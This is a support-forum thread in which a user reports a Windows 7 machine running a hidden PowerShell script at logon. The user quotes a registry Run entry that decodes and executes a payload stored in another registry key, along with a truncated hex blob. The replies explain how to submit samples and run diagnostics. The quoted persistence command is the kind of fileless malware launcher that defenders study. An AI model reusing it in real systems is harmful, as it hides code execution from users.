Announcement: New Knowledge Base

4 June 2020: We are pleased to announce the launch of a new Knowledge Base, Changelogs for Business Security Products, where you can find more details, such as bugfixes or new features, about the most recent releases of our business-related products.

strange power shell script

Dear Support,

today i discovered a windows 7 workstation that during the user access was starting a strange powershell script.

Looking in Run key of the registry i seen this string: 

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"

 

Loking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F i see this data.

(The byte data is mutch longher)

 

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]

 

Could be some king of malware?

Answers

  • jameschjamesch Posts: 125

    Hi tecnicogsn

     

    If you suspect that:
    • A clean file has been falsely detected as malicious, or;
    • A file that is malicious but has not been detected by our software
    You can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link: https://www.f-secure.com/en/web/labs_global/submit-a-sample#sample-file
    1. Select the File Sample tab.
    2. Click Choose File, and attach your sample file.
      • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
      • Note: Subject and description should be written in English.
    3. Verify that you are not a robot with reCAPTCHA.
    4. Click Submit sample file.
    The sample submission is analyzed by our analysts and databases, and is updated if necessary.

    For more information how you can submit a sample, read our Community article here.
  • etomcatetomcat Posts: 1,312

    Hello,

     

    I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.

     

    Best Regards: Tamas Feher, Hungary.

Sign In or Register to comment.